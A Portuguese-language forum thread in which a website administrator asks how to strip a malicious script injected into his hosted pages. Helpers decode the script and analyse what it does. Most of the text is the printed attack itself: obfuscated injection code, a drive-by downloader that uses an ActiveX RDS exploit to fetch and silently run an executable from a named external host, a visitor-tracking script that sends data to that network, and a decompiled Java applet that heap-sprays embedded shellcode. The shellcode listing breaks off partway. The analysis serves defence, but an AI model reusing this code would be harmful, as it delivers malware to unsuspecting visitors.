Remover Script

[_Darkness_ 0]

Olá! Estou com um problema de seguranca em um dos sites que administro.Devido a uma falha de seguranca do Terra um malware esta colocando códigos maliciosos no meu html, porém o código é sempre o mesmo...sempre dentro ta tag <script></script> dentro do corpo do documento, teria alguma forma de eu remover isso usando Javascript, por que remover na mão ta ficando f*** rs...todo dia, e como o Terra ainda não solucionou o problema , isso ajudaria mt...Grato, Alan Unger

[vagner.net 0]

Alan, da pra remover com Javascript sim. Mas postae um exemplo de como o código está sua página, que fica mais fácil ajudar.OK..!!?? T+...PS: Já entrou em contato com o TERRA?

[_Darkness_ 0]

Alan, da pra remover com Javascript sim. Mas postae um exemplo de como o código está sua página, que fica mais fácil ajudar.OK..!!?? T+...PS: Já entrou em contato com o TERRA?

Já sim...O código é esse

<script language="JavaScript">e = '0x00' + '7A';str1 = "%C1%99%92%8F%E5%88%89%82%91%9E%C6%DB%8F%92%88%92%9B%92%91%92%89%82%C3%9D%92%99%99%9E%97%DB%C7%C1%92%9F%8B%9A%96%9E%E5%88%8B%98%C6%DB%9D%89%89%95%C3%D4%D4%90%94%97%92%98%97%89%D7%98%94%96%D4%91%99%D4%96%9E%97%89%D4%DB%E5%8C%92%99%89%9D%C6%CA%E5%9D%9E%92%9C%9D%89%C6%CA%C7%C1%D4%92%9F%8B%9A%96%9E%C7%C1%D4%99%92%8F%C7";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

[vagner.net 0]

Mas postae um exemplo de como o código está sua página, que fica mais fácil ajudar.

Poxa Darkness, eu esperava o código da página, pra poder identificar a posição dessa TAG na estrutura DOM do arquivo!!!Identificando a TAG, da pra excluir o Node via Javascript/DOM (em runtime), da uma olhada no site do W3SCHOOLS.OK..!!?? T+...

[_Darkness_ 0]

Mas postae um exemplo de como o código está sua página, que fica mais fácil ajudar.

Poxa Darkness, eu esperava o código da página, pra poder identificar a posição dessa TAG na estrutura DOM do arquivo!!!Identificando a TAG, da pra excluir o Node via Javascript/DOM (em runtime), da uma olhada no site do W3SCHOOLS.OK..!!?? T+...

NUss mals ae, não vou postar o código todo pq é muito extenso...mas em resumo a estrutura da pagina eh essa...<body><div id="container"> <div id="corpo"> <div id="topo"> </div> <div id="conteudo"> [OBJETO flash] [AQUI FICA O VÍRUS] </div> <div id=""rodape"> </div> </div></div></body>

[vagner.net 0]

Testa nesse script e adapta a sua situação:

<script>function getVirus(){	var virus = document.getElementById('conteudo').getElementsByTagName('script').item(0);	document.getElementById('conteudo').removeChild(virus);}</script><body onload="getVirus();"><div id="container">	<div id="corpo">		<div id="topo">		</div>		<div id="conteudo">			<script language="JavaScript">				document.write('AQUI ESTÀ O VÍRUS');			</script>		</div>		<div id="rodape">			<input type=button value=Exibir onclick="alert(document.getElementById('conteudo').innerHTML)" />		</div> 	</div></div></body>

Coloquei esse botão para você visualizar o efeito da função, depois você comenta a chamada da função getVirus() e verifica o retorno do innerHTML.

[_Darkness_ 0]

Testa nesse script e adapta a sua situação:

<script>function getVirus(){	var virus = document.getElementById('conteudo').getElementsByTagName('script').item(0);	document.getElementById('conteudo').removeChild(virus);}</script><body onload="getVirus();"><div id="container">	<div id="corpo">		<div id="topo">		</div>		<div id="conteudo">			<script language="JavaScript">				document.write('AQUI ESTÀ O VÍRUS');			</script>		</div>		<div id="rodape">			<input type=button value=Exibir onclick="alert(document.getElementById('conteudo').innerHTML)" />		</div> 	</div></div></body>

Coloquei esse botão para você visualizar o efeito da função, depois você comenta a chamada da função getVirus() e verifica o retorno do innerHTML.

Eae cara, beleza?

Então eu testei a função que você fez...mas aqui ela não funcionou, tipo a frase "AQUI ESTÁ O VÍRUS" não é removida...

[hinom 5]

o código convertido para caracteres fica assim:

 

 

<div style="visibility:hidden"><iframe src="http://konicnt.com/ld/ment/" width=1 height=1></iframe></div>

 

a página índice do link http://konicnt.com/ld/ment/, contém isso:

 

<html><head></head><body><script LANGUAGE="JavaScript">setTimeout('Onload()', 5000);function Onload(){self.focus();<!--document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ani.htm"></iframe>');document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="fi.php"></iframe>');-->} </script><script language="javascript">	var ldurl = "konicnt.com/ld/ment/ld_ment.exe";	var obj_RDS = document.createElement('object');	obj_RDS.setAttribute('id','obj_RDS');	obj_RDS.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');	var is__obj_adodb = 0;	try {		var obj_adodb = obj_RDS.CreateObject("adodb.stream","");		is__obj_adodb = 1;		}	catch(e){}	if (is__obj_adodb != 1) {		try {			var obj_adodb = new ActiveXObject("adodb.stream"); is__obj_adodb = 1;			}		catch(e){}		}	if (is__obj_adodb == 1) {		try {			var obj_ShellApp = obj_RDS.CreateObject("S"+"hell.Application","");			var obj_msxml2 = new ActiveXObject("m"+"sxm"+"l"+"2.XM"+"LH"+"T"+"TP");			obj_msxml2.open("G"+"E"+"T","htt"+"p"+":"+"/"+"/"+ldurl,false);			obj_msxml2.send();			obj_adodb.type = 1;			obj_adodb.open();			var bod = obj_msxml2.responseBody;			obj_adodb.Write(bod);			var fn = "C:\\x.exe";			obj_adodb.SaveToFile(fn,2);			obj_adodb.close();			obj_ShellApp.ShellExecute(fn);			}		catch(e){}		} </script><script language="VBScript">Module_Path="htt"&"p"&":/"&"/konicnt.com/ld/ment/ld_ment.exe"If navigator.appName="Microsoft Internet Explorer" Then	If InStr(navigator.platform,"Win32") <> 0 Then	Const ssfFONTS=20	Const adModeReadWrite=3	Const adTypeBinary=1	Const adSaveCreateOverWrite=2	Dim oRDS	Dim oXMLHTTP	Dim oFSO	Dim oStream	Dim oWShell	Dim oShellApp	Dim WinDir	Dim ExeName	Dim XMLBody	Dim PluginFile	Dim cByte	Dim ObjName	Dim ObjProg	Randomize	ExeName=GenerateName()	ExeName=ExeName & ".exe"	cls1="clsid:BD96"	cls2="C556-65A"	cls3="3-11D0-9"	cls4="83A-00C04FC29E36"	clsfull=cls1&cls2&cls3&cls4	Set oRDS=document.createElement("object")	oRDS.setAttribute "id","oRDS"	oRDS.setAttribute "classid", clsfull	Set oShellApp = oRDS.CreateObject("S"&"hell.Application","")	Set oFolder = oShellApp.NameSpace(ssfFONTS)	Set oFolderItem=oFolder.ParseName("Symbol.ttf")	Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)	WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"	ExeName=WinDir & ExeName	ObjName="Microsoft"	ObjProg="XMLHTTP"	set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)	Req_type="G" & "E" & "T"	Execute "HTT"&"PSes"&"sion=oX"&"MLHT"&"TP.O"&"pen(Req_Ty"&"pe,Mo"&"dule_Path,0)"	oXMLHTTP.Send()	On Error Resume Next	XMLBody=oXMLHTTP.responseBody	ObjName="ADODB"	ObjProg="Stream"	On Error Resume Next	Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")	If Err.number <> 0 Then		Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")		Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)		Plugin_size=LenB(XMLBody)		For j=1 To Plugin_size			cByte=MidB(XMLBody,j,1)			ByteCode=AscB(cByte)			PluginFile.Write(Chr(ByteCode))		Next		PluginFile.Close		Set oWShell=oRDS.CreateObject("WScript.Shell","")		On Error Resume Next		oWShell.Run (ExeName),1,FALSE	Else	oStream.Mode=adModeReadWrite	oStream.Type=adTypeBinary	oStream.Open	oStream.Write XMLBody	oStream.SaveToFile ExeName,adSaveCreateOverWrite	Execute "oShe"&"llA"&"pp.Sh"&"ellEx"&"ecute Ex"&"eName"	End IfEnd IfEnd IfFunction GenerateName()	RandomName=""	rr=Int(8*Rnd)	ik=0	Do		ii=Int(25*Rnd)+97		RandomName=RandomName+Chr(ii)		ik=ik+1	Loop While ik<rr	GenerateName=RandomNameEnd Function</SCRIPT><script language="VBScript">on error resume nextdl = "htt"&"p"&":/"&"/konicnt.com/ld/ment/ld_ment.exe"Set df = document.createElement("object")cls1="clsid:BD96"cls2="C556-65A"cls3="3-11D0-9"cls4="83A-00C04FC29E36"clsfull=cls1&cls2&cls3&cls4df.setAttribute "classid",clsfullstrr1="Mic"strr2="roso"strr3="ft."strr4="XML"strr5="HTTP"strr=strr1&strr2&strr3&strr4&strr5Execute "Set x = df.Crea"&"teOb"&"ject(strr,"""")"ab1="A"ab2="dod"ab3="b.S"ab4="t"ab5="re"ab6="am"strb1=ab1&ab2&ab3&ab4&ab5&ab6strb5=strb1set YY = df.createobject(strb5,"")YY.type = 1str6="G"&"E"&"T"x.Open str6, dl, Falsex.Sendfnamezz1="update.exe"scripp1="Scrip"scripp2="ting"scripp3=".Fil"scripp4="eSyste"scripp5="mObject"scripp=scripp1&scripp2&scripp3&scripp4&scripp5set FF = df.createobject(scripp,"")set tmp1 = F.GetSpecialFolder(2)fnamezz1= FF.BuildPath(tmp1,fnamezz1)YY.openYY.write x.responseBodyYY.savetofile fnamezz1,2YY.closeset MM = df.createobject("S"&"hell.Application","")MM.ShellExecute fnamezz1,"","","open",0</script> <script src="http://trfcnt.com/wa/ment/softngine.js"></script> <script src="http://trfcnt.com/wa/trfall/softngine.js"></script> <div style="visibility:hidden"><applet archive="crtdcghcn.jar" code="BaaaaBaa.class" width=1 height=1><applet code="java.class" width="100" height="100"></div></body></html>

 

o trojan original é baixado automaticamente desse link:

http://konicnt.com/ld/ment/ld_ment.exe

 

e gravado no caminho c:/x.exe, na máquina cliente. Em seguida é executado automaticamente.

 

 

 

fonte do http://trfcnt.com/wa/ment/softngine.js

 

var _hsu = "http://trfcnt.com/wa/ment";var _utimeout = 600;var _hsd = new Array();_hsd[0] = "trfcnt.com";_hsd[1] = "clvcnt.com";_hsd[2] = "gggh1.net";_hsd[3] = "incnt.net";_hsd[4] = "outcnt.net";_hsd[5] = "hhhg1.com";_hsd[6] = "outcnt.com";// Don't modify under linevar _hdt, _hdn="", _hld = null, _huq = 0, _hrf="", _hmime="";var _hdo = document, _hdl = _hdo.location;_hwaTracker();function _hwaTracker(){	if (_hdl.protocol == "file:") return;	var s="", trf = "", turl="", rf="", url="";	_hwaDomain();	var is_exist = true;/*	var is_exist = false;	for (var i=0; i < _hsd.length; i++) {		if (_hdn.indexOf(_hsd[i]) != -1) {			is_exist = true;			break;		}	}	if (!is_exist) return;*/	var d = new Date();	_hdt = d.getTime();	s += "ut="+_hdt;	_hrf = _hdo.referrer;	eval("try{ trf = top.document.referrer; }catch(_e){}");	eval("try{ turl = top.document.location.href; }catch(_e){}");	if (_hrf == turl) _hrf = trf;	_hrf = _hwaUnescape(_hrf);	_hrf = _hrf.replace (/[&]/g, ';');	s += "&rf="+_hrf;	url = _hdl.href;	url = url.replace (/[&]/g, ';'); 	s += "&url="+url;	s += _hwaCookieInit();	s += _hwaGetConfig();	var i=new Image();	i.src=_hsu+"/process.php?"+s;	i.onload=function() { return;};}function _hwaDomain(){	var d = _hdo.domain;	if (d.substring(0,4) == "www.") {		d = d.substring(4, d.length);	}	_hdn = d;}function _hwaUnescape(str){	var re = /(\%u[A-Z0-9]{4})/g;	var m = str.match(re);	if (m != null) {		var tu = m.length;		for (var i=0; i < tu; i++) {			str = str.replace(m[i], unescape(m[i]));		}	}	return str;}function _hwaGetCookie(sName){	var aCookie = _hdo.cookie.split("; ");	var cookie_len = aCookie.length;	for (var i=0; i < cookie_len; i++) {		var aCrumb = aCookie[i].split("=");		if (sName == aCrumb[0]) {			return unescape(aCrumb[1]);		}	}	return null;}function _hwaSetCookie (name, value, expDays, path){	_hdo.cookie = name + "=" + escape(value) +	((expDays == null) ? "" : ("; expires=" + expDays.toGMTString())) +	((path	== null) ? "" : ("; path=" + path)) +	((_hdn	== "") ? "" : ("; domain=" + _hdn)); }function _hwaRemoveCookie (name){	var exp = new Date();	exp.setTime (exp.getTime() - 1);	var cval = _hwaGetCookie (name);	_hdo.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();}function _hwaSetDatetime (expDays){	var expDate = new Date();	expDate.setTime(expDate.getTime() + (86400 * 1000 * expDays));	return expDate;}function _hwaCookieInit(){	var s="";	var count = _hwaGetCookie('hwatime');	var unique = _hwaGetCookie('hwaunique');	if (unique == null) {		_huq = 1;		var utime = new Date();		utime.setHours(23);		utime.setMinutes(59);		utime.setSeconds(59);		utime.setMilliseconds(999);		_hwaSetCookie('hwaunique', 1, utime, "/");	} 	if (count == null) {		_hwaSetCookie('hwatime', _hdt, _hwaSetDatetime(365), "/");	}	else {		var found = 0;		var reg = new RegExp("^http[s]?:\/\/([-a-z0-9]+\.)?" + _hdn, "ig");		if (_hrf && reg.test(_hrf)) { found = 1; }		if (found) { _hld = -1; }		else { _hld = _hwaGetCookie('hwatime'); }		_hwaRemoveCookie('hwatime');		_hwaSetCookie('hwatime', _hdt, _hwaSetDatetime(365), "/");	}	if (_hld == null) _hld = 0;	s += "&lv="+_hld+"&uq="+_huq;	return s;}function _hwaGetConfig(){	var s="";	var n = navigator;	var an = n.appName;	var ua = n.userAgent;	var ua2 = ua.toLowerCase();	var moz = (an.indexOf("Netscape") != -1);	var ie  = (ua2.indexOf("msie") != -1);	var win = ((ua2.indexOf("win")!=-1) || (ua2.indexOf("32bit")!=-1));	var jv = n.javaEnabled() ? "1" : "0";	var ck = n.cookieEnabled ? "1" : "0";	s+="&jv="+jv+"&ck="+ck;		var pdf='0', qt='0', xd='0', sf='0', rp='0', wm='0';	if (win && ie) {		xd = _hwaPlugIE("SWCtl.SWCtl.1") ? "1" : "0";		sf = _hwaPlugIE("ShockwaveFlash.ShockwaveFlash.1") ? "1" : "0";		if (_hwaPlugIE("PDF.PdfCtrl.1")) pdf = "1";		if (_hwaPlugIE('PDF.PdfCtrl.5')) pdf = "1";		if (_hwaPlugIE('PDF.PdfCtrl.6')) pdf = "1";		qt = _hwaPlugIE("QuickTimeCheckObject.QuickTimeCheck.1") ? "1" : "0";		rp  = _hwaPlugIE("rmocx.RealPlayer G2 Control.1") ? "1" : "0";		wm = _hwaPlugIE("MediaPlayer.MediaPlayer.1") ? "1" : "0";	} else if (!win || moz) {		for (var i=0; i < n.mimeTypes.length; i++) 			_hmime += n.mimeTypes[i].type.toLowerCase();		xd  = _hwaPlugMoz("application/x-director") ? "1" : "0";		sf  = _hwaPlugMoz("application/x-shockwave-flash") ? "1" : "0";		pdf = _hwaPlugMoz("application/pdf") ? "1" : "0";		qt  = _hwaPlugMoz("video/quicktime") ? "1" : "0";		rp  = _hwaPlugMoz("audio/x-pn-realaudio-plugin") ? "1" : "0";		wm  = _hwaPlugMoz("application/x-mplayer2") ? "1" : "0";	}	s+="&pdf="+pdf+"&qt="+qt+"&xd="+xd+"&sf="+sf+"&rp="+rp+"&wm="+wm;	var cd = window.screen.colorDepth;	var rs = window.screen.width+"X"+window.screen.height;	var ln = (n.language) ? n.language : n.browserLanguage;	ln = ln.toLowerCase();	s+="&cd="+cd+"&rs="+rs+"&ln="+ln+"&ua="+ua;		return s;}function _hwaPlugMoz(plug){	find = false;	if (_hmime.indexOf(plug) != -1) {	if (navigator.mimeTypes[plug].enabledPlugin != null) {		find = true;	}	}	return find;}function _hwaPlugIE(plug){	find = false;	_hdo.write('<SCR' + 'IPT LANGUAGE=VBScript>\n on error resume next \n find = IsObject(CreateObject("' + plug + '"))</SCR' + 'IPT>\n');	if (find)  return true;	else return false;}function _hwaSearch(_rcode, val) {	   var len = _rcode.length;	   for (var i=0; i < len; i++) {			  if (_rcode[i] == val) return i;	   }	   return -1;}function _hwaClick(cc, url){	var i = new Image();	i.src = _hsu+"/ckTracker.php?cc="+cc;	i.onload=function() { return;};	if (url != undefined) document.location.href = url;}function _hwaAd(gc, ac, url){	var utime = new Date();	var atime = utime.getTime();	utime.setHours(23);	utime.setMinutes(59);	utime.setSeconds(59);	utime.setMilliseconds(999);	var code = gc+"_"+ac;	var _rcode = new Array();	var _rtime = new Array();	var refresh = false;	var adcode = _hwaGetCookie('hwa_ad_code');	if (adcode == null) {		_rcode[0] = code;		_rtime[0] = atime;		refresh = true;	} else {		var adtime = _hwaGetCookie('hwa_ad_time');		_rcode = adcode.split("|");		_rtime = adtime.split("|");		var _si = -1;		if ((_si = _hwaSearch(_rcode, code)) >= 0) {			var _adtime = _rtime[_si]; 			if ((atime-_adtime) > (_utimeout*1000)) {				_rtime[_si] = atime;				refresh = true;			}		} else {			var cl = _rcode.length;			var tl = _rtime.length;			_rcode[cl] = code;			_rtime[tl] = atime;			refresh = true;		}	}	if (refresh) {		var rcode = _rcode.join("|");		var rtime = _rtime.join("|");		_hwaSetCookie('hwa_ad_code', rcode, utime, "/");		_hwaSetCookie('hwa_ad_time', rtime, utime, "/");		var i = new Image();		i.src = _hsu+"/adTracker.php?gc="+gc+"&ac="+ac;		i.onload=function() { return;};	}	if (url != undefined) document.location.href = url;}

 

 

 

http://trfcnt.com/wa/trfall/softngine.js ( nao encontrado )

 

 

arquivos JAVA

http://konicnt.com/ld/ment/crtdcghcn.jar

http://konicnt.com/ld/ment/java.class

http://konicnt.com/ld/ment/BaaaaBaa.class ( dentro do arquivo .jar)

[hinom 5]

BaaaaBass.class decompilado:

 

// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.// Jad home page: http://www.kpdus.com/jad.html// Decompiler options: packimports(3) // Source File Name:   BaaaaBaa.javaimport java.applet.Applet;import java.awt.*;public class BaaaaBaa extends Applet{	public BaaaaBaa()	{		image = null;	}	public void init()	{		image = Toolkit.getDefaultToolkit().createImage(imageBytes);	}	public void paint(Graphics g)	{		int i = 0x5000000;		int j = 0x100000;		byte abyte0[] = new byte[i];		byte byte0 = 36;		for(int k = 0; k < abyte0.length; k++)			abyte0[k] = byte0;		for(int l = 1; l < 80; l++)		{			for(int i1 = 0; i1 < shellcode.length; i1++)				abyte0[(l * j - shellcode.length - 4096) + i1] = shellcode[i1];		}		if(image != null)			g.drawImage(image, 0, 0, this);	}	private Image image;	byte imageBytes[] = {		71, 73, 70, 56, 57, 97, -106, 0, -116, 0, 		-26, 0, 0, 45, 32, 33, 74, 108, -67, 73, 		91, -111, 123, -120, -60, 105, 89, 81, 109, 113, 		-114, 91, 75, 57, 123, 99, 89, -72, -86, -105, 		-2, -8, -20, 38, 38, 65, 75, 71, 88, 74, 		108, -77, -111, 123, 111, -12, -25, -38, -87, -107, 		-116, 96, 91, 100, 82, 63, 58, -22, -41, -58, 		69, 75, 99, 73, 51, 46, 62, 57, 78, 95, 		106, -110, 116, 100, 99, -34, -56, -67, -44, -75, 		-93, -92, -126, 113, 97, 75, 59, 125, 108, 106, 		-103, -103, -103, 64, 44, 40, 82, 106, -66, 82, 		91, -127, 118, 122, -106, 74, 60, 58, 82, 107, 		-75, 51, 51, 102, 80, 107, -81, -65, -62, -34, 		88, 102, -101, 114, 92, 84, 99, 82, 83, 66, 		79, 122, -90, -100, -94, 51, 40, 51, -1, -1, 		-1, -92, -115, -124, -29, -65, -91, 67, 50, 58, 		84, 48, 45, 83, 74, 75, -116, -127, -116, -123, 		115, 108, -123, 106, 97, 88, 108, -90, 99, 82, 		74, -121, 123, 127, -10, -18, -25, 92, 96, 126, 		-74, -74, -47, 90, 81, 84, 98, 88, 90, 114, 		102, 107, 83, 115, -74, 55, 42, 38, -55, -91, 		-114, 71, 67, 77, 59, 55, 59, -119, -116, -90, 		81, 96, -113, -44, -42, -36, 85, 67, 68, 75, 		107, -60, 103, 114, -99, 85, 81, 104, 85, 115, 		-67, 64, 68, 96, -116, 113, 111, -73, -100, -114, 		-2, -5, -10, 65, 49, 44, 82, 100, -90, 88, 		65, 49, 102, 102, 102, 73, 84, 120, -50, -72, 		-79, -21, -36, -47, -86, -91, -66, 93, 111, -84, 		-29, -56, -73, -110, 91, 95, -95, -124, 124, 101, 		105, 124, 89, 107, -100, -80, -112, 125, 90, 73, 		65, 75, 57, 49, -23, -21, -12, -100, -108, -83, 		116, 99, 89, 51, 51, 51, -59, -86, -100, 90, 		76, 75, 106, 82, 75, -82, 117, 120, 123, 105, 		98, 116, 126, -82, 74, 64, 66, 89, 62, 60, 		115, 108, 116, 81, 57, 47, -75, -98, -105, 47, 		47, 64, 82, 75, 85, -10, -17, -33, 99, 112, 		-93, 108, 92, 91, 72, 113, -69, 122, 112, 119, 		59, 68, 105, 91, 114, -75, 106, 85, 81, 76, 		113, -74, 91, 100, -112, 100, 78, 67, 66, 58, 		60, 108, 124, -85, -109, 114, 102, 33, -7, 4, 		4, 20, 0, -1, 0, 44, 0, 0, 0, 0, 		0, 0, -116, 0, 0, 7, -1, -128, 36, -126, 		-125, -124, -123, -122, -121, -120, -119, -118, -117, -116, 		-115, -114, -113, -112, -111, -110, -109, -108, -107, -106, 		-105, -104, -103, -102, -101, -100, -99, -98, -97, -96, 		-95, -94, -93, -92, -91, -90, -89, -88, 1, 37, 		37, 31, 117, 35, 35, 12, 31, 31, -81, -87, 		-75, -74, -115, -85, -78, 81, 2, 119, 81, 31, 		12, 12, -73, -62, -61, -121, 75, 39, 10, 67, 		84, 35, 117, -82, 35, -60, -49, -90, 122, 122, 		-78, 122, -126, 81, 119, 67, 44, 11, 69, -52, 		-78, -48, -33, -94, -46, -44, 1, 75, 2, 10, 		100, 48, 48, 19, 37, 72, -77, -32, -17, -91, 		115, 112, 44, 48, 44, 66, 2, -29, -16, -6, 		-97, 35, -40, 44, -1, 100, 38, -40, -88, -74, 		-81, 32, 39, 60, 36, 0, -12, -7, -57, -94, 		2, -120, 31, 6, 35, 102, -62, -61, 4, 0, 		-103, 108, -12, 4, 30, -110, 38, -79, 99, 34, 		113, 2, -104, -112, 97, -8, 79, 72, -111, 37, 		30, 83, 62, 90, 66, 66, -63, -102, 62, 64, 		-128, 64, 1, -46, 71, 25, 18, 36, -46, 114, 		-86, -36, 73, 8, -113, -118, 127, 50, 98, -62, 		-16, 48, 100, 65, 20, 66, -30, 120, 42, -75, 		-127, 109, -56, 16, 48, 80, -94, 66, 89, 83, 		4, 98, -128, -100, 31, -108, -90, 36, 104, 78, 		72, -100, -89, 96, -46, 1, 17, 65, 37, -41, 		7, -114, 90, 61, 6, 11, 32, 0, 14, -103, 		30, 50, -1, -64, -124, 29, 74, 97, -62, -119, 		17, 55, -47, -90, -107, 8, -20, -61, -119, 10, 		107, -42, -104, 57, -110, 14, 70, -44, 56, 39, 		111, 34, 89, -69, 55, 34, -80, 37, 42, -122, 		-8, 8, 44, 99, 77, 97, 24, 17, 116, 32, 		109, -36, 113, -102, 10, 50, 62, -24, 28, 57, 		34, 67, -124, -23, 116, 84, 24, 48, -85, 67, 		-112, 115, -60, 17, 123, 120, -56, -96, -109, 66, 		70, -27, -64, 34, 40, 40, 41, -79, -70, -75, 		-21, -126, 81, 64, -52, -24, -63, -125, -74, -19, 		-64, 107, 68, 84, 56, -127, -14, 119, -57, 34, 		112, -20, 12, 79, 65, -57, -116, -103, 8, -90, 		69, -80, 80, -47, -36, -103, -13, 125, 31, -26, 		-76, -31, 49, -61, 78, -113, -13, 102, 76, 71, 		-120, 0, -93, 2, 30, 65, -34, -65, -61, -5, 		96, -95, -61, 12, 58, 118, 56, -100, -65, -79, 		62, -62, -32, 10, -20, -24, -15, 74, 124, -14, 		125, 51, 65, 15, 29, -32, -48, -61, 5, 23, 		16, 48, -40, 23, 55, -16, -57, 66, 20, -35, 		-100, 85, -32, 55, 72, -108, 16, -126, 15, 62, 		-52, -128, 3, 29, 23, -48, -15, -59, -120, 55, 		-92, -57, -126, 0, -51, 93, -8, -114, 13, 5, 		120, -56, 32, 7, 28, 16, 48, 98, 4, 20, 		80, 112, 3, 12, -36, -87, -8, 13, 71, 54, 		80, 17, -121, 29, 118, -68, 56, -58, -116, -21, 		109, 112, -60, 29, 41, -22, 8, -115, -1, 13, 		22, 76, -31, -61, -117, 105, -96, 112, 6, 127, 		17, -36, 32, 5, 5, 42, 88, -91, 36, 52, 		88, 20, 0, 1, -112, 12, 50, -120, -62, 23, 		96, -16, -63, -121, 27, 30, -28, -72, 37, 52, 		93, 112, 1, -63, -109, 12, -46, -127, 2, 10, 		52, 70, -64, -121, 1, 80, 60, -76, -26, 51, 		63, -88, 17, -121, 25, 12, -90, 65, 3, 10, 		17, 74, 33, -59, 23, -21, -119, -64, 93, 29, 		-34, -20, 105, 11, 30, 33, -12, -64, -31, 24, 		99, -28, 97, -23, -99, 6, -16, 17, -127, 7, 		80, -36, -95, -91, -93, -74, -88, 49, 30, 4, 		32, 94, 16, 97, -124, 35, -54, -24, 6, 24, 		19, -32, -123, -109, 111, -96, -106, -94, 6, 4, 		-110, -6, 64, -64, -83, -89, 70, 72, -64, 13, 		6, 68, -64, -60, 15, 121, -63, 26, -85, 40, 		35, 36, -63, 3, 15, -76, -90, -112, -57, -100, 		-52, 18, 112, -58, -120, -54, -67, 119, -107, -80, 		-61, -126, -126, 71, 1, -57, 30, 107, -35, 13, 		-51, -34, 74, 0, 31, 107, -112, 96, 21, -75, 		-43, 126, -94, -58, 20, 107, 28, 123, -86, -91, 		121, -116, -127, 2, -91, 105, 56, -88, 102, -71, 		-90, -88, -47, -61, 17, 41, -84, -69, 44, -68, 		81, -114, 65, 0, 4, 32, -112, 75, -81, 39, 		75, 36, 33, 88, -66, 55, -28, 65, 7, 29, 		-108, 18, -64, -127, -65, 50, -102, 84, -31, -64, 		-94, -32, -95, -125, -1, 109, 60, -104, 113, -61, 		-83, -17, -62, -5, -18, 25, 40, 24, 69, 113, 		60, 16, -60, -111, -19, -83, 32, -6, -101, 6, 		-91, 40, 28, 64, 7, 8, 40, -47, 50, 50, 		40, 93, -12, 16, -57, -97, 55, 44, 28, 102, 		13, 52, 28, 48, 39, 7, 16, -100, 48, 72, 		86, 51, 127, -30, 7, 113, -57, 18, 0, 98, 		26, 76, -9, -116, 2, 1, 76, -21, 0, 11, 		3, 55, -55, 92, -76, 38, 35, 112, -111, 66, 		10, 26, 47, -67, 114, 13, 13, 68, -119, 2, 		7, 83, -100, 112, -106, 30, 85, 19, 120, 53, 		37, 104, 35, -127, 5, 23, 102, -20, 74, 0, 		-91, 28, 48, -40, 68, 13, 115, -46, 64, -125, 		14, -20, 0, -109, -10, -38, -105, 80, -115, -60, 		28, 83, 48, 76, -23, 24, 48, 114, -48, 68, 		19, 79, -113, 65, 3, 7, 82, 83, -45, -74, 		-38, -128, 67, 2, -117, 32, 73, -124, 118, -127, 		-34, 105, -64, -104, 70, -40, 115, 10, -54, -127, 		5, -30, -24, 85, 121, 37, 107, -7, -79, -80, 		-30, 97, -21, -83, 56, 13, -127, -90, 97, -121, 		13, 1, -84, 37, -16, -23, -112, -24, -111, -60, 		-46, 77, 52, -80, -59, 22, -114, 55, 64, 3, 		-91, 52, -44, -64, 5, 99, -72, 107, -94, 71, 		8, 11, -45, -32, -5, 3, 46, 52, 32, 125, 		-68, 7, 52, 80, 67, 1, -73, 39, 47, -55, 		-14, 11, 55, -15, -69, 19, 46, 56, -79, -123, 		-1, -11, 40, -12, 126, 0, -23, -38, 111, -14, 		67, 8, 40, -128, -19, 66, -8, 78, -108, -15, 		-128, -49, 103, -12, -114, -126, 5, -23, 95, 18, 		-33, -6, 7, 120, -1, 126, 25, 94, 8, -62, 		22, 14, 112, -128, 26, -12, 46, 13, 123, -56, 		-97, 37, -10, 23, 2, -80, 125, -49, 9, 94, 		-48, -128, 4, -67, -16, 7, -23, 53, 32, 9, 		10, -52, -60, 15, -120, -32, -68, 45, 60, 0, 		1, 78, -8, -125, 6, 2, 8, -63, 32, -68, 		-31, -126, 25, 76, 68, 95, 102, 49, -96, 22, 		-70, 10, 15, 51, -112, -34, -5, 34, -24, -124, 		32, -108, 33, 3, 65, 8, -62, 11, 50, 48, 		-122, 46, 76, 43, 39, -39, -93, 24, 86, 100, 		1, -116, 68, -84, 66, 16, 115, 88, -127, -17, 		34, 56, -62, 32, 100, 32, 3, 47, -120, -30, 		14, 107, 48, 7, -92, -104, 46, 125, -118, 65, 		2, 51, 16, -63, -128, 40, -88, -63, 5, 34, 		108, 34, 20, 95, -112, 5, 9, -104, 49, 11, 		78, 120, -128, 26, 70, -16, -127, -101, -92, 112, 		-120, -65, 0, 70, 17, 9, 81, 2, 44, -20, 		96, 5, 111, 112, 1, 2, -54, -112, -123, 62, 		74, -64, 1, 114, 8, -92, 3, 28, -128, -127, 		42, -120, -95, 4, -125, -112, 35, -47, -46, 87, 		2, 27, -40, 0, 11, 120, -120, 100, 36, 95, 		17, -123, 74, -50, -63, 4, 97, -80, 66, 14, 		18, -112, -128, 39, 120, -110, -1, -109, -99, -12, 		100, 14, 54, -103, 0, 35, -40, -128, 1, 64, 		12, -30, -64, -126, -47, 14, 44, -20, -127, 9, 		16, -128, 64, 1, -120, 112, -123, 43, -20, -64, 		4, -72, -60, 100, 11, 60, -55, -53, 39, -76, 		-32, -105, -64, 12, 38, 48, 77, 80, -124, 40, 		100, -15, -118, 87, 99, -27, 8, -4, 48, -123, 		-72, 16, 96, 11, 85, -88, -126, 4, 48, -112, 		-128, 28, 120, 114, -105, -68, -76, -90, 47, -123, 		41, -52, 107, 26, 97, 0, 71, -52, -32, -75, 		88, 112, -124, 51, 60, 0, 3, 101, -128, 102, 		25, -2, 56, 74, 109, 62, 33, 7, 14, -112, 		-128, 28, 66, -55, 75, 78, 110, -109, -105, -65, 		52, -62, 21, -44, -128, -123, 57, 38, -49, 6, 		21, 24, 77, 30, -76, -16, -121, 63, 56, -31, 		-119, 25, 24, 36, 39, -127, -23, -55, 64, -126, 		-110, -109, -127, 36, -27, 67, 71, -23, -53, 39, 		-124, -63, 4, 3, -120, -126, -43, 26, 53, -77, 	